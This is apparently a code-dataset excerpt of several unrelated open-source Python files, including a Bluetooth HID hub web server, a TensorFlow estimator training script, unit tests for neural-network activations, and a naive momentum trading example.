max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
atcodertools/fmtprediction/models/index.py
|
come2ry/atcoder-tools
| 313 |
102260
|
from atcodertools.fmtprediction.models.calculator import CalcNode
class Index:
"""
The model to store index information of a variable, which has a likely the minimal / maximal value and for each dimension.
Up to 2 indices are now supported.
In most cases, the minimal value is 1 and the maximal value is some variable like N.
"""
def __init__(self):
self.min_index = None
self.max_index = None
def update(self, new_value: str):
self._update_min(new_value)
self._update_max(new_value)
def get_length(self):
assert self.max_index is not None
assert self.min_index is not None
return CalcNode.parse(
"{max_index}-({min_index})+1".format(
max_index=self.max_index,
min_index=self.min_index)
).simplify()
def _update_min(self, new_value: str):
if not new_value.isdecimal():
# consider variable is not always could not be minimal.
return
if (self.min_index is None) or (self.min_index.evaluate() > CalcNode.parse(new_value).evaluate()):
self.min_index = CalcNode.parse(new_value)
def _update_max(self, new_value: str):
if not new_value.isdecimal():
self.max_index = CalcNode.parse(new_value)
if (self.max_index is None) or (
len(self.max_index.get_all_variables()) == 0 and self.max_index.evaluate() < CalcNode.parse(
new_value).evaluate()
):
self.max_index = CalcNode.parse(new_value)
|
saicinpainting/training/modules/fake_fakes.py
|
BishmoyPaul/lama
| 2,133 |
102310
|
<reponame>BishmoyPaul/lama<gh_stars>1000+
import torch
from kornia import SamplePadding
from kornia.augmentation import RandomAffine, CenterCrop
class FakeFakesGenerator:
def __init__(self, aug_proba=0.5, img_aug_degree=30, img_aug_translate=0.2):
self.grad_aug = RandomAffine(degrees=360,
translate=0.2,
padding_mode=SamplePadding.REFLECTION,
keepdim=False,
p=1)
self.img_aug = RandomAffine(degrees=img_aug_degree,
translate=img_aug_translate,
padding_mode=SamplePadding.REFLECTION,
keepdim=True,
p=1)
self.aug_proba = aug_proba
def __call__(self, input_images, masks):
blend_masks = self._fill_masks_with_gradient(masks)
blend_target = self._make_blend_target(input_images)
result = input_images * (1 - blend_masks) + blend_target * blend_masks
return result, blend_masks
def _make_blend_target(self, input_images):
batch_size = input_images.shape[0]
permuted = input_images[torch.randperm(batch_size)]
augmented = self.img_aug(input_images)
is_aug = (torch.rand(batch_size, device=input_images.device)[:, None, None, None] < self.aug_proba).float()
result = augmented * is_aug + permuted * (1 - is_aug)
return result
def _fill_masks_with_gradient(self, masks):
batch_size, _, height, width = masks.shape
grad = torch.linspace(0, 1, steps=width * 2, device=masks.device, dtype=masks.dtype) \
.view(1, 1, 1, -1).expand(batch_size, 1, height * 2, width * 2)
grad = self.grad_aug(grad)
grad = CenterCrop((height, width))(grad)
grad *= masks
grad_for_min = grad + (1 - masks) * 10
grad -= grad_for_min.view(batch_size, -1).min(-1).values[:, None, None, None]
grad /= grad.view(batch_size, -1).max(-1).values[:, None, None, None] + 1e-6
grad.clamp_(min=0, max=1)
return grad
|
reference/NumpyDL-master/tests/test_activaton.py
|
code4bw/deep-np
| 186 |
102338
|
<gh_stars>100-1000
# -*- coding: utf-8 -*-
import numpy as np
import pytest
from npdl import activations
def test_activation():
from npdl.activations import Activation
act = Activation()
with pytest.raises(NotImplementedError):
act.forward((10, 10))
with pytest.raises(NotImplementedError):
act.derivative()
assert str(act) == 'Activation'
def test_get():
with pytest.raises(ValueError):
activations.get(1)
with pytest.raises(ValueError):
activations.get('l')
class TestActivations(object):
@pytest.mark.parametrize('activation',
['sigmoid',
'tanh',
'relu',
'linear',
'softmax',
'elliot',
'SymmetricElliot',
'SoftPlus',
'SoftSign'])
def test_activation(self, activation):
input = np.arange(24).reshape((4, 6))
npdl_act = activations.get(activation)
if activation == 'sigmoid':
f_res = npdl_act.forward(input)
assert 0. <= np.all(f_res) <= 1.
assert npdl_act.derivative().shape == input.shape
elif activation == 'tanh':
f_res = npdl_act.forward(input)
assert -1. <= np.all(f_res) <= 1.0
assert npdl_act.derivative().shape == input.shape
elif activation == 'relu':
f_res = npdl_act.forward(input)
assert np.all(f_res) >= 0.
assert npdl_act.derivative().shape == input.shape
assert np.all(npdl_act.derivative()) <= 1.
elif activation == 'linear':
f_res = npdl_act.forward(input)
assert np.allclose(f_res, input)
assert npdl_act.derivative().shape == input.shape
assert np.all(npdl_act.derivative()) == 1.
elif activation == 'softmax':
f_res = npdl_act.forward(input)
assert 0. <= np.all(f_res) <= 1.0
assert npdl_act.derivative().shape == input.shape
assert np.all(npdl_act.derivative()) == 1.
elif activation == 'elliot':
f_res = npdl_act.forward(input)
assert f_res.shape == input.shape
assert npdl_act.derivative().shape == input.shape
elif activation == 'SymmetricElliot':
f_res = npdl_act.forward(input)
assert f_res.shape == input.shape
assert npdl_act.derivative().shape == input.shape
elif activation == 'SoftPlus':
f_res = npdl_act.forward(input)
assert f_res.shape == input.shape
assert npdl_act.derivative().shape == input.shape
elif activation == 'SoftSign':
f_res = npdl_act.forward(input)
assert f_res.shape == input.shape
assert npdl_act.derivative().shape == input.shape
|
tests/functional/features/steps/registers.py
|
dia38/pylink
| 217 |
102350
|
# Copyright 2017 Square, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import behave
@behave.when('I write {value} to ICE register {register}')
def step_write_to_ice_register(context, value, register):
"""Writes a value to a single ICE register.
Args:
context (Context): the ``Context`` instance
value (str): the value to write to the register
register (str): the register to write to
Returns:
``None``
"""
jlink = context.jlink
register = int(register, 0)
value = int(value, 0)
jlink.ice_register_write(register, value)
@behave.when('I write {value} to register {register}')
def step_write_to_register(context, value, register):
"""Writes a value to a single register.
Args:
context (Context): the ``Context`` instance
value (str): the value to write to the register
register (str): the register to write to
Returns:
``None``
"""
jlink = context.jlink
jlink.register_write(int(register), int(value))
@behave.when('I write to the registers')
def step_write_to_registers(context):
"""Writes multiple values to multiple registers.
The values and registers are loaded from the context's table.
Args:
context (Context): the ``Context`` instance
Returns:
``None``
"""
jlink = context.jlink
registers, values = [], []
for row in context.table:
registers.append(int(row['register']))
values.append(int(row['value']))
jlink.register_write_multiple(registers, values)
@behave.then('ICE register {register} should have the value {value}')
def step_ice_register_has_value(context, register, value):
"""Checks that an ICE register has a particular value.
Args:
context (Context): the ``Context`` instance
register (str): the ICE register to read from
value (str): the value the ICE register should have
Returns:
``None``
"""
jlink = context.jlink
register = int(register, 0)
expected = int(value, 0)
assert jlink.ice_register_read(register) == expected
@behave.then('register {register} should have the value {value}')
def step_register_has_value(context, register, value):
"""Reads a single value from a single register and asserts equality.
Args:
context (Context): the ``Context`` instance
Returns:
``None``
"""
jlink = context.jlink
actual = jlink.register_read(int(register))
assert actual == int(value)
@behave.then('I should read from the registers')
def step_registers_have_values(context):
"""Reads multiple values from multiple registers and asserts equality.
Args:
context (Context): the ``Context`` instance
Returns:
``None``
"""
jlink = context.jlink
registers, expected_values = [], []
for row in context.table:
registers.append(int(row['register']))
expected_values.append(int(row['value']))
assert expected_values == jlink.register_read_multiple(registers)
|
Chapter4/ch4_naive_momentum_strategy2.py
|
buiksat/Learn-Algorithmic-Trading
| 449 |
102369
|
<filename>Chapter4/ch4_naive_momentum_strategy2.py
#!/bin/python3
import pandas as pd
import numpy as np
from pandas_datareader import data
import matplotlib.pyplot as plt
def load_financial_data(start_date, end_date,output_file):
try:
df = pd.read_pickle(output_file)
print('File data found...reading GOOG data')
except FileNotFoundError:
print('File not found...downloading the GOOG data')
df = data.DataReader('GOOG', 'yahoo', start_date, end_date)
df.to_pickle(output_file)
return df
goog_data=load_financial_data(start_date='2001-01-01',
end_date = '2018-01-01',
output_file='goog_data.pkl')
def naive_momentum_trading(financial_data, nb_conseq_days):
signals = pd.DataFrame(index=financial_data.index)
signals['orders'] = 0
cons_day=0
prior_price=0
init=True
for k in range(len(financial_data['Adj Close'])):
price=financial_data['Adj Close'][k]
if init:
prior_price=price
init=False
elif price>prior_price:
if cons_day<0:
cons_day=0
cons_day+=1
elif price<prior_price:
if cons_day>0:
cons_day=0
cons_day-=1
if cons_day==nb_conseq_days:
signals['orders'][k]=1
elif cons_day == -nb_conseq_days:
signals['orders'][k]=-1
return signals
ts=naive_momentum_trading(goog_data, 5)
fig = plt.figure()
ax1 = fig.add_subplot(111, ylabel='Google price in $')
goog_data["Adj Close"].plot(ax=ax1, color='g', lw=.5)
ax1.plot(ts.loc[ts.orders== 1.0].index,
goog_data["Adj Close"][ts.orders == 1],
'^', markersize=7, color='k')
ax1.plot(ts.loc[ts.orders== -1.0].index,
goog_data["Adj Close"][ts.orders == -1],
'v', markersize=7, color='k')
plt.legend(["Price","Buy","Sell"])
plt.title("Naive Momentum Trading Strategy")
plt.show()
import sys
sys.exit(0)
|
web.py
|
Dreamsorcerer/bthidhub
| 166 |
102377
|
<reponame>Dreamsorcerer/bthidhub
# Copyright (c) 2020 ruundii. All rights reserved.
from aiohttp import web,WSMessage
from password import *
import json
from hid_devices import *
from bluetooth_devices import *
import asyncio
import concurrent.futures
import sys
import subprocess
from aiohttp_session import SimpleCookieStorage, session_middleware
from aiohttp_security import check_authorized, \
is_anonymous, authorized_userid, remember, forget, \
setup as setup_security, SessionIdentityPolicy
from aiohttp_security.abc import AbstractAuthorizationPolicy
PI_USER = 'pi'
class PiAuthorizationPolicy(AbstractAuthorizationPolicy):
async def authorized_userid(self, identity):
"""Retrieve authorized user id.
Return the user_id of the user identified by the identity
or 'None' if no user exists related to the identity.
"""
if identity == PI_USER:
return identity
async def permits(self, identity, permission, context=None):
"""Check user permissions.
Return True if the identity is allowed the permission
in the current context, else return False.
"""
return identity == PI_USER
class Web:
def __init__(self, loop: asyncio.AbstractEventLoop, adapter, bluetooth_devices:BluetoothDeviceRegistry, hid_devices: HIDDeviceRegistry):
self.loop = loop
self.adapter = adapter
self.adapter.set_on_agent_action_handler(self.on_agent_action)
self.adapter.set_on_interface_changed_handler(self.on_adapter_interface_changed)
self.hid_devices = hid_devices
self.hid_devices.set_on_devices_changed_handler(self.on_hid_devices_change)
self.bluetooth_devices = bluetooth_devices
self.bluetooth_devices.set_on_devices_changed_handler(self.on_bluetooth_devices_change)
middleware = session_middleware(SimpleCookieStorage())
self.app = web.Application(middlewares=[middleware])
self.app.router.add_route('*', '/', self.root_handler)
self.app.router.add_route('POST', '/changepassword', self.change_password_handler)
self.app.router.add_route('POST', '/restartservice', self.restart_service_handler)
self.app.router.add_route('POST', '/reboot', self.reboot_handler)
self.app.router.add_route('POST', '/login', self.handler_login)
self.app.router.add_route('GET', '/authorised', self.handler_is_authorised)
self.app.router.add_route('POST', '/setdevicecapture', self.set_device_capture)
self.app.router.add_route('POST', '/setdevicefilter', self.set_device_filter)
self.app.router.add_route('POST', '/setcompatibilitydevice', self.set_compatibility_device)
self.app.router.add_route('POST', '/startscanning', self.start_scanning)
self.app.router.add_route('POST', '/stopscanning', self.stop_scanning)
self.app.router.add_route('POST', '/startdiscoverable', self.start_discoverable)
self.app.router.add_route('POST', '/stopdiscoverable', self.stop_discoverable)
self.app.router.add_route('GET', '/hiddevices', self.get_hid_devices_handler)
self.app.router.add_route('GET', '/bluetoothdevices', self.get_bluetooth_devices)
self.app.router.add_routes([web.get('/ws', self.websocket_handler)])
self.app.router.add_static('/',"web/")# add_routes([web.get('/', self.hello)])
policy = SessionIdentityPolicy()
setup_security(self.app, policy, PiAuthorizationPolicy())
self.runner = None
self.site = None
self.ws = []
self.executor = concurrent.futures.ThreadPoolExecutor(max_workers=3)
#web.run_app(self.app)
asyncio.run_coroutine_threadsafe(self.start_server(), loop=self.loop)
async def handler_login(self, request):
data = await request.post()
password = data['password']
if(is_valid_current_password(PI_USER, password)):
redirect_response = web.HTTPFound('/')
await remember(request, redirect_response, PI_USER)
raise redirect_response
else:
raise web.HTTPUnauthorized()
async def handler_is_authorised(self, request):
await check_authorized(request)
return web.Response()
async def on_hid_devices_change(self):
for ws in self.ws:
await ws.send_json({'msg': 'hid_devices_updated'})
async def on_bluetooth_devices_change(self):
for ws in self.ws:
await ws.send_json({'msg': 'bt_devices_updated'})
async def start_server(self):
self.runner = web.AppRunner(self.app)
await self.runner.setup()
self.site = web.TCPSite(self.runner, None, 8080)
await self.site.start()
async def root_handler(self, request):
return web.HTTPFound('/index.html')
async def change_password_handler(self, request):
await check_authorized(request)
data = await request.post()
current_password = data['<PASSWORD>']
new_password = data['<PASSWORD>']
if not is_valid_current_password(PI_USER, current_password):
return web.HTTPUnauthorized()
if not set_new_password(PI_USER, new_password):
return web.HTTPError
return web.Response(text="Password successfully changed")
async def restart_service_handler(self, request):
await check_authorized(request)
sys.exit(1)
async def reboot_handler(self, request):
await check_authorized(request)
subprocess.Popen(['reboot'])
async def get_hid_devices_handler(self, request):
await check_authorized(request)
return web.Response(text=json.dumps(self.hid_devices.get_hid_devices_with_config()))
async def set_device_capture(self, request):
await check_authorized(request)
data = await request.post()
device_id = data['device_id']
capture_state = data['capture'].lower() == 'true'
self.hid_devices.set_device_capture(device_id, capture_state)
return web.Response()
async def set_device_filter(self, request):
await check_authorized(request)
data = await request.post()
device_id = data['device_id']
filter = data['filter']
self.hid_devices.set_device_filter(device_id, filter)
return web.Response()
async def set_compatibility_device(self, request):
await check_authorized(request)
data = await request.post()
device_path = data['device_path']
compatibility_state = data['compatibility_state'].lower() == 'true'
self.hid_devices.set_compatibility_device(device_path, compatibility_state)
return web.Response()
async def start_scanning(self, request):
await check_authorized(request)
try:
self.adapter.start_scan()
except Exception as exc:
return web.HTTPError(reason=str(exc))
return web.Response()
async def stop_scanning(self, request):
await check_authorized(request)
try:
self.adapter.stop_scan()
except Exception as exc:
return web.HTTPError(reason=str(exc))
return web.Response()
async def start_discoverable(self, request):
await check_authorized(request)
try:
self.adapter.start_discoverable()
except Exception as exc:
return web.HTTPError(reason=str(exc))
return web.Response()
async def stop_discoverable(self, request):
await check_authorized(request)
try:
self.adapter.stop_discoverable()
except Exception as exc:
return web.HTTPError(reason=str(exc))
return web.Response()
async def get_bluetooth_devices(self, request):
await check_authorized(request)
return web.Response(text=json.dumps(self.adapter.get_devices()))
async def on_agent_action(self, msg):
for ws in self.ws:
asyncio.run_coroutine_threadsafe(ws.send_json({'msg': 'agent_action', 'data':msg}), loop=self.loop)
async def on_adapter_interface_changed(self):
for ws in self.ws:
asyncio.run_coroutine_threadsafe(ws.send_json({'msg': 'bt_devices_updated'}), loop=self.loop)
async def websocket_handler(self, request):
await check_authorized(request)
ws = web.WebSocketResponse()
await ws.prepare(request)
async for msg in ws:
if msg.type == web.WSMsgType.TEXT:
data = json.loads(msg.data)
if 'msg' in data:
if data['msg'] == 'close' or data['msg'] == 'shutdown':
self.ws.remove(ws)
await ws.close()
elif data['msg'] == 'connect':
self.ws.append(ws)
await ws.send_json({'msg':'connected'})
print('websocket connection opened')
elif data['msg'] == 'cancel_pairing':
self.adapter.cancel_pairing(data['device'])
elif data['msg'] == 'request_confirmation_response':
self.adapter.agent_request_confirmation_response(data['device'], data['passkey'], data['confirmed'])
elif data['msg'] == 'pair_device':
print("pairing")
self.loop.run_in_executor(self.executor, self.adapter.device_action, 'pair', data['device'])
print("pairing end")
elif data['msg'] == 'connect_device':
self.loop.run_in_executor(self.executor, self.adapter.device_action, 'connect', data['device'])
elif data['msg'] == 'disconnect_device':
self.loop.run_in_executor(self.executor, self.adapter.device_action, 'disconnect', data['device'])
elif data['msg'] == 'remove_device':
self.loop.run_in_executor(self.executor, self.adapter.remove_device, data['device'])
else:
pass
#await ws.send_json({'msg':'connected'})
elif msg.type == web.WSMsgType.ERROR:
print('ws connection closed with exception %s' %
ws.exception())
print('websocket connection closed')
return ws
|
src/main/python/train_esitmator_distributed.py
|
moony320/shifu
| 200 |
102403
|
<filename>src/main/python/train_esitmator_distributed.py
# -*- coding: utf-8 -*-
# Copyright [2012-2018] PayPal Software Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Python Tensorflow NN Training, user can change TF DAG to customize NN used for training. Models will be saved in the
# same folder of regular models in 'models' folder and being evaluated in distributed shifu eval step.
#
import shutil
import argparse
from tensorflow.python.platform import gfile
import gzip
from StringIO import StringIO
import random
from tensorflow.python.framework import ops
from tensorflow.python.saved_model import builder
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.saved_model import signature_def_utils
from tensorflow.python.saved_model import tag_constants
import tensorflow as tf
import numpy as np
import sys
import os
import datetime
SHIFU_CONTEXT = {}
def get_activation_fun(name):
if name == None:
return tf.nn.leaky_relu
name = name.lower()
if 'sigmoid' == name:
return tf.nn.sigmoid
elif 'tanh' == name:
return tf.nn.tanh
elif 'relu' == name:
return tf.nn.relu
elif 'leakyrelu' == name:
return tf.nn.leaky_relu
else:
return tf.nn.leaky_relu
def get_loss_func(name):
if name == None:
return tf.metrics.mean_squared_error
name = name.lower()
if 'squared' == name:
return tf.metrics.mean_squared_error
elif 'absolute' == name:
return tf.metrics.mean_absolute_error
elif 'log' == name:
# No log error, we use root error here
return tf.metrics.root_mean_squared_error
else:
return tf.metrics.mean_squared_error
def get_optimizer(name):
if name == None:
return tf.train.AdamOptimizer
name = name.lower()
if 'adam' == name:
return tf.train.AdamOptimizer
elif 'gradientDescent' == name:
return tf.train.GradientDescentOptimizer
elif 'RMSProp' == name:
return tf.train.RMSPropOptimizer
else:
return tf.train.AdamOptimizer
def get_initalizer(name):
if 'gaussian' == name:
return tf.initializers.random_normal()
elif 'xavier' == name:
return tf.contrib.layers.xavier_initializer()
else:
return tf.contrib.layers.xavier_initializer()
def export_generic_config(export_dir):
config_json_str = ""
config_json_str += "{\n"
config_json_str += " \"inputnames\": [\n"
config_json_str += " \"shifu_input_0\"\n"
config_json_str += " ],\n"
config_json_str += " \"properties\": {\n"
config_json_str += " \"algorithm\": \"tensorflow\",\n"
config_json_str += " \"tags\": [\"serve\"],\n"
config_json_str += " \"outputnames\": \"shifu_output_0\",\n"
config_json_str += " \"normtype\": \"ZSCALE\"\n"
config_json_str += " }\n"
config_json_str += "}"
f = file(export_dir + "/" + "GenericModelConfig.json", mode="w+")
f.write(config_json_str)
def remove_path(path):
if not os.path.exists(path):
return
if os.path.isfile(path) and os.path.exists(path):
os.remove(path)
return
files = os.listdir(path)
for f in files:
remove_path(path + "/" + f)
os.removedirs(path)
def load_data(context):
train_data = []
train_target = []
valid_data = []
valid_target = []
training_data_sample_weight = []
valid_data_sample_weight = []
count = 0
train_pos_cnt = 0
train_neg_cnt = 0
valid_pos_cnt = 0
valid_neg_cnt = 0
feature_column_nums = context["feature_column_nums"]
sample_weight_column_num = context["sample_weight_column_num"]
delimiter = context["delimiter"]
allFileNames = gfile.ListDirectory(root)
normFileNames = filter(lambda x: not x.startswith(".") and not x.startswith("_"), allFileNames)
print(normFileNames)
print("Total input file count is " + str(len(normFileNames)) + ".")
sys.stdout.flush()
file_count = 1
line_count = 0
for normFileName in normFileNames:
print("Now loading " + normFileName + " Progress: " + str(file_count) + "/" + str(len(normFileNames)) + ".")
sys.stdout.flush()
file_count += 1
with gfile.Open(root + '/' + normFileName, 'rb') as f:
gf = gzip.GzipFile(fileobj=StringIO(f.read()))
while True:
line = gf.readline()
if len(line) == 0:
break
line_count += 1
if line_count % 10000 == 0:
print("Total loading lines cnt: " + str(line_count))
sys.stdout.flush()
columns = line.split(delimiter)
if feature_column_nums == None:
feature_column_nums = range(0, len(columns))
feature_column_nums.remove(target_index)
if random.random() >= valid_data_percentage:
# Append training data
train_target.append([float(columns[target_index])])
if(columns[target_index] == "1"):
train_pos_cnt += 1
else :
train_neg_cnt += 1
single_train_data = []
for feature_column_num in feature_column_nums:
single_train_data.append(float(columns[feature_column_num].strip('\n')))
train_data.append(single_train_data)
if sample_weight_column_num >= 0 and sample_weight_column_num < len(columns):
weight = float(columns[sample_weight_column_num].strip('\n'))
if weight < 0.0:
print("Warning: weight is below 0. example:" + line)
weight= 1.0
training_data_sample_weight.append([weight])
else:
training_data_sample_weight.append([1.0])
else:
# Append validation data
valid_target.append([float(columns[target_index])])
if(columns[target_index] == "1"):
valid_pos_cnt += 1
else:
valid_neg_cnt += 1
single_valid_data = []
for feature_column_num in feature_column_nums:
single_valid_data.append(float(columns[feature_column_num].strip('\n')))
valid_data.append(single_valid_data)
if sample_weight_column_num >= 0 and sample_weight_column_num < len(columns):
weight = float(columns[sample_weight_column_num].strip('\n'))
if weight < 0.0:
print("Warning: weight is below 0. example:" + line)
weight= 1.0
valid_data_sample_weight.append([weight])
else:
valid_data_sample_weight.append([1.0])
print("Total data count: " + str(line_count) + ".")
print("Train pos count: " + str(train_pos_cnt) + ".")
print("Train neg count: " + str(train_neg_cnt) + ".")
print("Valid pos count: " + str(valid_pos_cnt) + ".")
print("Valid neg count: " + str(valid_neg_cnt) + ".")
sys.stdout.flush()
context['feature_count'] = len(feature_column_nums)
return train_data, train_target, valid_data, valid_target, training_data_sample_weight, valid_data_sample_weight
def serving_input_receiver_fn():
global SHIFU_CONTEXT
inputs = {
'input_feature': tf.placeholder(tf.float32, [None, SHIFU_CONTEXT["feature_count"]], name='shifu_input_0')
}
return tf.estimator.export.ServingInputReceiver(inputs, inputs)
def dnn_model_fn(features, labels, mode, params):
shifu_context = params.shifu_context
layers = shifu_context["layers"]
learning_rate = shifu_context["learning_rate"]
loss_func = shifu_context["loss_func"]
optimizer_name = shifu_context["optimizer"]
weight_initalizer = shifu_context["weight_initalizer"]
act_funcs = shifu_context["act_funcs"]
#print(labels)
#sys.stdout.flush()
input_layer = tf.convert_to_tensor(features['input_feature'], dtype=tf.float32)
#sample_weight = tf.convert_to_tensor(features['sample_weight'], dtype=tf.float32)
# Start define model structure
model = [input_layer]
current_layer = input_layer
for i in range(len(layers)):
node_num = layers[i]
current_layer = tf.layers.dense(inputs=current_layer, units=node_num, activation=get_activation_fun(act_funcs[i]), kernel_initializer=get_initalizer(weight_initalizer))
model.append(current_layer)
logits = tf.layers.dense(inputs=current_layer, units=1)
prediction = tf.nn.sigmoid(logits, name="shifu_output_0")
def _train_op_fn(loss):
"""Returns the op to optimize the loss."""
optimizer = get_optimizer(optimizer_name)(learning_rate=learning_rate)
# Create training operation
train_op = optimizer.minimize(loss=loss, global_step=tf.train.get_global_step())
return train_op
head = tf.contrib.estimator.regression_head(
label_dimension=1,
name='regression_head',
loss_reduction=tf.losses.Reduction.SUM_BY_NONZERO_WEIGHTS,
loss_fn=get_loss_func(loss_func),
weight_column='sample_weight'
)
return head.create_estimator_spec(
features,
mode,
prediction,
labels=labels,
train_op_fn=_train_op_fn
)
def metric_fn(labels, predictions, features, config):
metrics = {}
pred_values = predictions['predictions']
global SHIFU_CONTEXT
metrics["average_loss"] = get_loss_func(SHIFU_CONTEXT["loss_func"])(labels, pred_values, weights=features['sample_weight'])
return metrics
def create_estimator(run_config, hparams):
estimator = tf.estimator.Estimator(
model_fn=dnn_model_fn,
config=run_config,
params=hparams
)
estimator = tf.contrib.estimator.add_metrics(estimator, metric_fn)
return estimator
if __name__ == "__main__":
print("Training input arguments: " + str(sys.argv))
print(tf.__version__)
sys.stdout.flush()
# Use for parse Arguments
parser = argparse.ArgumentParser("Shifu_tensorflow_training")
parser.add_argument("-inputdaatapath", action='store', dest='inputdaatapath', help="data path used for training",
type=str)
parser.add_argument("-delimiter", action='store', dest='delimiter',
help="delimiter of data file to seperate columns", type=str)
parser.add_argument("-target", action='store', dest='target', help="target index in training data file", type=int)
parser.add_argument("-validationrate", action='store', dest='validationrate', default=0.2, help="validation rate",
type=float)
parser.add_argument("-hiddenlayernodes", action='store', dest='hiddenlayernodes', help="NN hidden layer nodes",
nargs='+',type=int)
parser.add_argument("-epochnums", action='store', dest='epochnums', help="", type=int)
parser.add_argument("-checkppointinterval", action='store', dest='checkpointinterval', default=0, help="", type=int)
parser.add_argument("-modelname", action='store', dest='modelname', default="model0", help="", type=str)
parser.add_argument("-seletectedcolumnnums", action='store', dest='selectedcolumns', help="selected columns list",
nargs='+', type=int)
parser.add_argument("-weightcolumnnum", action='store', dest='weightcolumnnum', help="Sample Weight column num", type=int)
parser.add_argument("-learningRate", action='store', dest='learningRate', help="Learning rate of NN", type=float)
parser.add_argument("-lossfunc", action='store', dest='lossfunc', help="Loss functions", type=str)
parser.add_argument("-optimizer", action='store', dest='optimizer', help="optimizer functions", type=str)
parser.add_argument("-weightinitalizer", action='store', dest='weightinitalizer', help="weightinitalizer functions", type=str)
parser.add_argument("-actfuncs", action='store', dest='actfuncs', help="act funcs of each hidden layers",
nargs='+',type=str)
parser.add_argument("-minibatch", action='store', dest='minibatch', help="batch size of each iteration", type=int)
args, unknown = parser.parse_known_args()
root = args.inputdaatapath
target_index = args.target
hidden_layers = args.hiddenlayernodes
feature_column_nums = args.selectedcolumns
valid_data_percentage = args.validationrate
model_name = args.modelname
delimiter = args.delimiter.replace('\\', "")
sample_weight_column_num = args.weightcolumnnum
learning_rate = args.learningRate
loss_func = args.lossfunc
optimizer = args.optimizer
weight_initalizer = args.weightinitalizer
act_funcs = args.actfuncs
batch_size = args.minibatch
RESUME_TRAINING = False
# Make SHIFU_CONTEXT to be global so that metric_fn can be read
global SHIFU_CONTEXT
SHIFU_CONTEXT["feature_column_nums"] = feature_column_nums
SHIFU_CONTEXT["layers"] = hidden_layers
SHIFU_CONTEXT["batch_size"] = batch_size
SHIFU_CONTEXT["export_dir"] = "./models"
SHIFU_CONTEXT["epoch"] = args.epochnums
SHIFU_CONTEXT["model_name"] = model_name
SHIFU_CONTEXT["checkpoint_interval"] = args.checkpointinterval
SHIFU_CONTEXT["sample_weight_column_num"] = sample_weight_column_num
SHIFU_CONTEXT["learning_rate"] = learning_rate
SHIFU_CONTEXT["loss_func"] = loss_func
SHIFU_CONTEXT["optimizer"] = optimizer
SHIFU_CONTEXT["weight_initalizer"] = weight_initalizer
SHIFU_CONTEXT["act_funcs"] = act_funcs
SHIFU_CONTEXT["delimiter"] = delimiter
if not os.path.exists("./models"):
os.makedirs("./models", 0777)
input_features, targets, validate_feature, validate_target, training_data_sample_weight, valid_data_sample_weight = load_data(SHIFU_CONTEXT)
# Train the model
SHIFU_CONTEXT["total_steps"] = (len(input_features)/SHIFU_CONTEXT['batch_size'])*SHIFU_CONTEXT['epoch']
export_dir = SHIFU_CONTEXT["export_dir"] + "/" + SHIFU_CONTEXT["model_name"]
hparams = tf.contrib.training.HParams(shifu_context=SHIFU_CONTEXT)
run_config = tf.estimator.RunConfig(tf_random_seed=19830610, model_dir=export_dir)
train_input_fn = tf.estimator.inputs.numpy_input_fn(
x={'input_feature': np.asarray(input_features, dtype=np.float32), 'sample_weight': np.asarray(training_data_sample_weight, dtype=np.float32)},
y=np.asarray(targets, dtype=np.float32),
batch_size=SHIFU_CONTEXT["batch_size"],
num_epochs=SHIFU_CONTEXT['epoch'],
shuffle=False)
train_spec = tf.estimator.TrainSpec(input_fn = train_input_fn, max_steps=SHIFU_CONTEXT["total_steps"])
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
x={'input_feature': np.asarray(validate_feature, dtype=np.float32), 'sample_weight': np.asarray(valid_data_sample_weight, dtype=np.float32)},
y=np.asarray(validate_target, dtype=np.float32),
batch_size=SHIFU_CONTEXT["batch_size"],
num_epochs=1,
shuffle=False)
eval_spec = tf.estimator.EvalSpec(input_fn = eval_input_fn)
if not RESUME_TRAINING:
print("Removing previous artifacts...")
shutil.rmtree(export_dir, ignore_errors=True)
else:
print("Resuming training...")
sys.stdout.flush()
tf.logging.set_verbosity(tf.logging.INFO)
estimator = create_estimator(run_config, hparams)
tf.estimator.train_and_evaluate(estimator=estimator, train_spec=train_spec, eval_spec=eval_spec)
estimator.export_savedmodel(export_dir, serving_input_receiver_fn)
export_generic_config(export_dir=export_dir)
'''
prediction, cost_func, train_op, input_placeholder, target_placeholder, graph, sample_weight_placeholder = build_graph(shifu_context=context)
session = tf.Session()
train(input_placeholder=input_placeholder, target_placeholder=target_placeholder, sample_weight_placeholder = sample_weight_placeholder, prediction=prediction,
cost_func=cost_func, train_op=train_op, input_features=input_features,
targets=targets, validate_input=validate_feature, validate_target=validate_target, session=session, context=context,
training_data_sample_weight=training_data_sample_weight, valid_data_sample_weight=valid_data_sample_weight)
'''
|
src/curt/curt/modules/smarthome/base_provider.py
|
sanyaade-teachings/cep
| 108 |
102426
|
"""
Copyright (C) Cortic Technology Corp. - All Rights Reserved
Written by <NAME> <<EMAIL>>, 2021
"""
from abc import abstractmethod
class BaseProvider:
def __init__(self):
self.token = ""
@abstractmethod
def config_control_handler(self, params):
pass
def command(self, params):
data = params["ready_data"][0]
if data["control_type"] == "get_devices":
return self.get_devices(data)
elif data["control_type"] == "light":
return self.control_light(data)
elif data["control_type"] == "media_player":
return self.control_media_player(data)
@abstractmethod
def get_devices(self, data):
pass
@abstractmethod
def control_light(self, data):
pass
@abstractmethod
def control_media_player(self, data):
pass
|
gcompiler/python/delta_infer/subgraphs/__init__.py
|
didichuxing/delta
| 1,442 |
102466
|
from .transformer import *
from .common import *
#tf.compat.v1.disable_eager_execution()
#
#batch_size = 40
#seq_length = 200
#hidden_size = 768
#num_attention_heads =12
#size_per_head = int(hidden_size / num_attention_heads)
#
